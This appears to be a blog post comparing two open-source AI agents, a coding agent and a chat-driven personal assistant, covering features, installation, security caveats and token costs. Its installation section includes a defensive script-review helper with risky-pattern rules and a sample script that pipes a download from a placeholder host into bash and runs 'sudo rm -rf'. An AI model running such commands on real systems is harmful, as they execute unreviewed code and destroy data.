Harness vs. OpenClaw: Two Very Different "Agents"

Created at May 30, 2026 02:28:40
Updated at May 30, 2026 02:30:20


If you've been anywhere near AI Twitter lately, you've probably seen two open-source projects throwing off sparks: Harness (the openharness project, published on PyPI as harness-agent) and OpenClaw. Both call themselves "agents," both are open source, and both want access to your machine. But they're built for almost opposite jobs, and lumping them together does a disservice to anyone trying to pick one.

Here's an honest look at what each one actually is, how you'd install it, and how to think about which (if either) belongs in your workflow.

What is Harness?

Harness is a coding agent — a command-line tool plus a Python SDK that drives an LLM through a read-edit-run loop inside your codebase. You point it at a repo, give it a task ("fix the auth bug," "refactor this module," "run the tests and fix what breaks"), and it works through the problem using a set of built-in tools: reading and writing files, running shell commands, searching code, fetching web pages, and spawning sub-agents for parallel work.
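To make the read-edit-run loop concrete, here is a minimal sketch of the general pattern. It is not Harness's code: `ToolCall`, `run_agent`, and `scripted_model` are hypothetical names, and the "model" is a scripted stand-in so the example runs without an API key.

```python
from dataclasses import dataclass
from typing import Callable, Union


@dataclass
class ToolCall:
    """A request from the model to run one named tool with one argument."""
    name: str
    argument: str


# Hypothetical interface: a "model" is any callable that reads the transcript
# so far and returns either a ToolCall or a final answer string.
Model = Callable[[list], Union[ToolCall, str]]


def run_agent(task, model, tools, max_steps=10):
    """Loop: ask the model, run the tool it picks, feed the result back."""
    transcript = [f"task: {task}"]
    for _ in range(max_steps):
        decision = model(transcript)
        if isinstance(decision, str):
            return decision  # the model says it is finished
        tool = tools.get(decision.name)
        if tool is None:
            result = f"error: unknown tool {decision.name!r}"
        else:
            result = tool(decision.argument)
        transcript.append(f"{decision.name}({decision.argument!r}) -> {result}")
    return "stopped: step limit reached"


# A scripted stand-in for an LLM (assumption: a real agent would call a provider).
def scripted_model(transcript):
    if len(transcript) == 1:
        return ToolCall("read_file", "auth.py")
    return "done after reading auth.py"


tools = {"read_file": lambda path: f"<contents of {path}>"}
print(run_agent("fix the auth bug", scripted_model, tools))
```

The step limit matters in practice: without it, a model that keeps requesting tools would loop (and spend tokens) indefinitely.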

Its main selling point is that it's model-agnostic. The same agent runs on Anthropic's Claude, OpenAI's GPT models, Google's Gemini, or a fully local model through Ollama — you switch with a single flag. That's a meaningful difference from agents that are welded to one provider.

A few features worth calling out: permission modes that range from "ask before every change" to a full auto-approve "bypass" mode for CI; context compaction that summarizes the conversation when you approach the model's limit; an MCP client for connecting external tools like Jira or Slack; and a skills system where you teach it workflows by dropping a Markdown file in a config folder. If that last part sounds familiar, it's because the design borrows heavily from the conventions popularized by tools like Claude Code.
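Context compaction is easier to picture with a sketch. The following is an illustration of the idea only, not how Harness implements it: the four-characters-per-token estimate is a crude assumption, and `compact` and the `summarize` callback are hypothetical names.

```python
def estimate_tokens(text):
    """Crude heuristic (assumption): about 4 characters per token."""
    return max(1, len(text) // 4)


def compact(messages, limit, keep_recent, summarize):
    """Replace older messages with one summary once the total nears the limit.

    messages:    list of strings, oldest first
    limit:       token budget that triggers compaction
    keep_recent: how many of the newest messages to keep verbatim
    summarize:   callback that turns a list of messages into one string
    """
    total = sum(estimate_tokens(m) for m in messages)
    split = len(messages) - keep_recent
    if total <= limit or split <= 0:
        return messages  # still fits, or nothing old enough to summarize
    older, recent = messages[:split], messages[split:]
    return [summarize(older)] + recent


history = ["x" * 400] * 5  # five messages of roughly 100 tokens each
compacted = compact(
    history,
    limit=300,
    keep_recent=2,
    summarize=lambda older: f"summary of {len(older)} messages",
)
print(compacted[0])  # the three oldest messages collapsed into one line
```

In a real agent the `summarize` step is itself a model call, so compaction trades a one-off token cost for a smaller context on every later turn.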

A note on the benchmark claims. The project's README states that Harness scores 100% on "Harness-Bench" and outperforms Claude Code, OpenCode, and pi-mono. Take this with appropriate salt: Harness-Bench is the project's own eight-task benchmark, and a tool topping the test its authors wrote isn't independent evidence of anything. The repo is also young and small at the time of writing. The architecture looks reasonable and the feature list is real — but treat "state of the art" as a marketing claim, not a measured fact, until third-party benchmarks (it does support running SWE-bench) confirm it.

What is OpenClaw?

OpenClaw is a personal assistant agent, and the framing is completely different. Instead of living in your terminal and editing code, it runs on your own machine (Mac, Windows, or Linux) and you talk to it through chat apps you already use — WhatsApp, Telegram, Discord, Slack, Signal, iMessage. You message it like a coworker and it does things: clears your inbox, manages your calendar, browses the web and fills out forms, runs shell commands, and remembers context across conversations.

It's also model-flexible (Claude, GPT, or local models) and heavily extensible through community-built "skills" and plugins, with the agent able to write its own. The project was created by Peter Steinberger and has had a genuinely viral run; its creator has since joined OpenAI while the project continues as open source.

The pitch, distilled: it's the "do things for me in the background" assistant that Siri was supposed to be, but open and running on hardware you control.

The real difference

The cleanest way to see it:

Harness is for builders working in a codebase. It's a developer tool. The output is committed code, fixed bugs, passing tests.
OpenClaw is for automating your personal and digital life. The output is a cleared inbox, a booked appointment, a daily briefing in your Telegram.

They overlap only at the edges — both can run shell commands, both use the MCP ecosystem, both let you define skills in Markdown. But choosing between them as if they compete is a bit like choosing between a power drill and a personal assistant. If you're shipping software, Harness. If you want an always-on agent handling your messages and errands, OpenClaw. Plenty of people in both communities run both, pointing OpenClaw at coding tools like Harness or Claude Code when they want code written from their phone.

Installing them (and a serious caveat first)

Both projects offer the same fashionable one-liner:

curl -fsSL <url>/install.sh | bash

I'd encourage you not to run either blindly. Piping a script straight from the internet into bash executes whatever is in it, with your permissions and without any review. For tools this young, download the script and read it first, or use the package-manager path in an isolated environment.
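As a reading aid for that review, here is a small sketch that highlights lines worth a closer look in a script you have already saved to disk (for example with curl's `-o install.sh` instead of the pipe). The pattern list is my own assumption and far from complete; it is a way to direct your attention, not a security scanner, and it does not replace reading the whole file.

```python
import re

# Assumed, non-exhaustive patterns that deserve a second look in an installer.
RISKY_PATTERNS = {
    "runs as root": re.compile(r"\bsudo\b"),
    "recursive delete": re.compile(r"\brm\s+-\w*r\w*f|\brm\s+-\w*f\w*r"),
    "pipes a download into a shell": re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"),
    "evaluates dynamic code": re.compile(r"\beval\b"),
}


def flag_risky_lines(script_text):
    """Return (line_number, reason, line) for every non-comment line that matches."""
    findings = []
    for number, line in enumerate(script_text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # skip blanks, comments, and the shebang
        for reason, pattern in RISKY_PATTERNS.items():
            if pattern.search(stripped):
                findings.append((number, reason, stripped))
    return findings


# Made-up sample script; example.invalid is a placeholder host.
sample = """#!/bin/bash
# installer
set -e
curl -fsSL https://example.invalid/payload.sh | bash
sudo rm -rf /opt/old-install
echo done
"""

for number, reason, line in flag_risky_lines(sample):
    print(f"line {number}: {reason}: {line}")
```

An empty result does not mean the script is safe; it only means none of these particular patterns appeared.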

Harness, the safer way:

pip install harness-agent
harness connect          # pick a provider, paste your API key
harness "Fix the bug in auth.py"

It requires Python 3.12+. Your API key lands in ~/.harness/config.toml. Be especially careful with --permission bypass, which auto-approves every action including shell commands — convenient for CI, dangerous on a machine you care about.
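Since the API key sits in a plain file, it is worth checking who can read it. A minimal sketch, assuming a POSIX system: the path comes from the paragraph above, the helper names are made up for illustration, and I have not verified whether Harness already sets restrictive permissions itself.

```python
import stat
from pathlib import Path


def is_private(path):
    """True if group and others have no permissions on the file."""
    mode = path.stat().st_mode
    return (mode & (stat.S_IRWXG | stat.S_IRWXO)) == 0


def restrict_to_owner(path):
    """Set the file to owner read/write only (0o600)."""
    path.chmod(stat.S_IRUSR | stat.S_IWUSR)


if __name__ == "__main__":
    # Path as described in this post; adjust if your install differs.
    config = Path.home() / ".harness" / "config.toml"
    if not config.exists():
        print(f"{config} not found")
    elif is_private(config):
        print(f"{config} is readable by its owner only")
    else:
        restrict_to_owner(config)
        print(f"tightened permissions on {config}")
```

On Windows, `chmod` only toggles the read-only flag, so this check is meaningful on macOS and Linux only.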

OpenClaw installs via npm (npm i -g openclaw, then openclaw onboard) and walks you through connecting a model and a chat app. Because it's designed to read your email, control your calendar, and act on your behalf, think hard about what you connect it to. The project's own blog has posts about where its security model is heading, which is a polite way of saying that part is still maturing. Granting an autonomous agent your credentials — or, as some enthusiastic early users have done, your credit card — is not something to do casually.

So which should you use?

Wrong question, most of the time. Decide what you're trying to automate:

Writing, fixing, reviewing, or refactoring code → look at Harness (and compare it honestly against Claude Code and OpenCode, which are more established).
Offloading email, calendar, errands, and digital chores → look at OpenClaw.

Both are early-stage, both are open source, and both ask for a lot of trust in exchange for their power. That trade-off — capability now, security still catching up — is the real story with this generation of agents, and it's worth keeping front of mind no matter which one you reach for.

What about token consumption?

This is the question everyone asks, and the honest answer is that the two tools can't be compared apples-to-apples on tokens — and you should be suspicious of anyone who claims otherwise.

The reason is simple: they do different work. Token usage for any agent is driven by the size of the task, how much context gets loaded, how much conversation history is replayed, and which model is running. A coding task in Harness ("refactor this module") and an assistant task in OpenClaw ("check my email") aren't the same unit of work, so putting their token counts side by side tells you nothing meaningful. Neither project publishes usage figures, and inventing a comparison table would be worse than useless.

What you can do is measure each tool's real usage yourself, within its own domain. Both expose the numbers:

Harness has built-in cost reporting. Inside the REPL, /cost shows token usage and cost for the current session, and /status shows the provider, model, session, and running cost. So for any task you give it, you can read the actual figure straight from the tool:

harness "Fix the failing tests in test_auth.py"
# ...agent works...

/cost      # → tokens used and dollar cost for this session

OpenClaw routes through your own API key, so its usage shows up in your provider's dashboard — the Anthropic Console or OpenAI usage page, depending on which model you connected. Run a task, then check the dashboard for the spend in that time window.

The "check my email" example

Worth being clear about: this example only runs on OpenClaw. Harness is a coding agent — its tools are file read/write/edit, shell, search, and web-fetch. It has no email integration, so there's nothing to measure on the Harness side of an inbox task.

On OpenClaw, a realistic way to measure it:

From your chat app (say Telegram), message your assistant: "Check my inbox and summarize anything that needs a reply today."
Let it run — it'll read your mail and respond in the chat.
Open your provider dashboard and note the tokens consumed in that window.

What drives the number, in rough order of impact: how many emails it actually reads (and how long they are), how much of its persistent memory and prior conversation gets replayed into context, and the model you chose — a frontier model like Claude Opus or GPT-5.2 will cost far more per run than a local Ollama model, which is effectively free on tokens but trades off quality and speed.
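To turn dashboard token counts into a rough dollar figure, the arithmetic is simple. The sketch below uses made-up numbers throughout: the email counts, token sizes, and per-million-token prices are placeholders, not any provider's real rates, so substitute the figures from your own dashboard and price sheet.

```python
def estimate_cost(input_tokens, output_tokens,
                  input_price_per_mtok, output_price_per_mtok):
    """Dollar cost of one run, given prices per million tokens."""
    return (input_tokens * input_price_per_mtok
            + output_tokens * output_price_per_mtok) / 1_000_000


# Hypothetical inbox run: 40 emails of ~800 tokens each,
# plus ~6,000 tokens of replayed memory and history.
input_tokens = 40 * 800 + 6_000   # 38,000
output_tokens = 1_500             # the summary sent back to chat

# Placeholder prices, in dollars per million tokens.
hosted = estimate_cost(input_tokens, output_tokens, 10.0, 50.0)
local = estimate_cost(input_tokens, output_tokens, 0.0, 0.0)

print(f"hosted model: ${hosted:.3f} per run")
print(f"local model:  ${local:.3f} per run (hardware and electricity not counted)")
```

With these placeholder values a single run costs about 46 cents on the hosted model, and input tokens account for most of it, which is why the number of emails read dominates the bill.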

If you want a genuinely useful comparison, the right experiment is: pick one realistic task from each tool's own domain, run both on the same underlying model, and report the real /cost and dashboard figures. Measured numbers from your own setup will be far more credible, and more interesting, than any generic claim.

My experience: OpenClaw runs up tokens fast

In my own use, OpenClaw has been a heavy token consumer. That tracks with how it's built: persistent memory and conversation history get replayed into context on each turn, and tasks like reading an inbox pull a lot of raw text in. If you're on a frontier model, that adds up quickly.
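Why replayed history adds up so quickly can be shown with a few lines of arithmetic. This is a simplified model with illustrative numbers, not a measurement of OpenClaw: it assumes the full history is resent on every turn, and it ignores model replies being added to the history as well as any caching or compaction.

```python
def cumulative_input_tokens(new_tokens_per_turn, fixed_context=0):
    """Total input tokens billed across a conversation with full replay.

    new_tokens_per_turn: new tokens added to the history on each turn
    fixed_context:       tokens resent unchanged every turn (e.g. memory)
    """
    history = 0
    total = 0
    for new in new_tokens_per_turn:
        history += new                    # history keeps growing
        total += fixed_context + history  # and all of it is sent again
    return total


turns = [500] * 10  # ten turns, 500 new tokens each (made-up figures)
print(sum(turns))                                        # 5000 tokens of actual new content
print(cumulative_input_tokens(turns))                    # 27500 with history replay
print(cumulative_input_tokens(turns, fixed_context=2_000))  # 47500 with memory on top
```

Under these assumptions, 5,000 tokens of new content become 47,500 billed input tokens, because the total grows roughly with the square of the number of turns.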

It's tempting to assume a coding agent like Harness would therefore be lighter — but I want to be careful here, because I haven't measured it, and the assumption doesn't really hold. Coding agents can be just as token-hungry, sometimes more: they load large files and whole codebases into context, replay them across turns, and spawn sub-agents that each carry their own context. Whether Harness uses fewer tokens than OpenClaw isn't something you can reason out from first principles — it depends entirely on the task, and the only honest way to know is to measure both.

So treat "OpenClaw uses a lot of tokens" as my lived experience, and don't read it as evidence that "Harness uses less." If you've measured Harness's /cost on real tasks, I'd love to hear your numbers; that's the data that would actually settle it.

Both projects are independent and not affiliated with the model providers they run on. Benchmark figures cited above are self-reported by the Harness project and were not independently verified for this post.

Tags: AI Agents AI Security Agent Comparison Coding Agent Developer Tool Harness Harness Agent LLM Agents Open Source OpenClaw Personal Assistant Token Consumption
